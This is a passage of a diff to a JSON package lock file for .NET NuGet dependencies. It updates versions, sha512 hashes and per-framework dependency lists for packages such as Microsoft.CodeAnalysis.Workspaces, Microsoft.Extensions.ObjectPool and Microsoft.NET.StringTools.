["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "id": "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "version": "4.12.0", "sha512": "sha512-j/XDFfNu38FSTJOIhkB8pvLWNVNqNhaZTRtLuH/WsHUsnYfIztaDW9seR7OsUBF5LuZIKQ9uaCrj7p+0/BgPkw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis.Workspaces.Common", "id": "Microsoft.CodeAnalysis.Workspaces.Common", "version": "4.12.0", "sha512": "sha512-bzZOMF3kAtQhc5kcUILy0GyhgePksk/j9DJtlvFex1UYNgXJUoEkA6IUGootH1Z6GH4Z5BuLNXiFzsz9oJwbcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeCoverage", "id": "Microsoft.CodeCoverage", "version": "17.12.0", "sha512": "sha512-POBqg788rrLApvncy8rvtyJ3ynsBdU0/SGUXD+vPqyRDM/aUJbPZWx01qalGJRK1GcArSku8QDd9AVMa0TkCkA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "7.0.13", "sha512": "sha512-N66kAzKBfcs4zIX/iVMUOhfn8Xv3Ye1QpLGS8IUSpCHa+Vxh2ZsdDiqd0Y2m7ryPU6FU2LOTnZ+0ymmm83vC6w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.8.3", "sha512": "sha512-3N/Ika66JZeORrIZ68fap6M0LSQ9+SQz277NxjA/dxETnR3dZwJXj67jAAc4FkijG6w//QzrC5NEregtIVjz1w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.0", "sha512": "sha512-dY64S9XmssfAjwvuGMHleFj2cKIhIFUU2D+Kr1D1Y+92mAPN/39HQMJay2FHxSRcDEI9hATivRV/I1N7QxVJcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.12.6", "sha512": "sha512-uCT/G0W1wUteqfrriWHfLfFmArka8ISo6nUkC5gQzYZYm2PSTuqfS14DEsY0gqDuQpcLLLaYTDcEM0SA2Za5vA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.Test.Sdk", "id": "Microsoft.NET.Test.Sdk", "version": "17.12.0", "sha512": "sha512-hGf8I8+yo15etavoMd+7OXcOG6/G7HYPDEJg5aQnhMzsxaUpq+udNZzSxmEN9rGTWMZOAVFcyNXNL7YBsN6chw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": ["Microsoft.CodeCoverage"], "net47": ["Microsoft.CodeCoverage"], "net471": ["Microsoft.CodeCoverage"], "net472": ["Microsoft.CodeCoverage"], "net48": ["Microsoft.CodeCoverage"], "net5.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net6.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net7.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net8.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net9.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "1.1.1", "sha512": "sha512-mDUJD1eLXIzmUnWCzWlmNQZGDp/cVGT8KyhzMcJNk2nlfdFUOoZai9idT8/FacJr8Nv8zhAmdf39FHm5qWUoGQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "1.1.3", "sha512": "sha512-pxwq8g2PYRiEF5KXVjmZFMNTqsg2Gr1puv/pR1sqAduAKHAGbaCuJ6+yc3pAJseClQUD29S2Ubrm7n/ZD78dUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.ObjectModel", "id": "Microsoft.TestPlatform.ObjectModel", "version": "17.12.0", "sha512": "sha512-klsXMgAPNWYo3ceakLkod4wYrk4lAV2Ehi676zUKgiVpQ5Yj6q3vsMhk/3pm97Ltk/hdcSW0rJKJvcQvTzPgYA==", "sources": 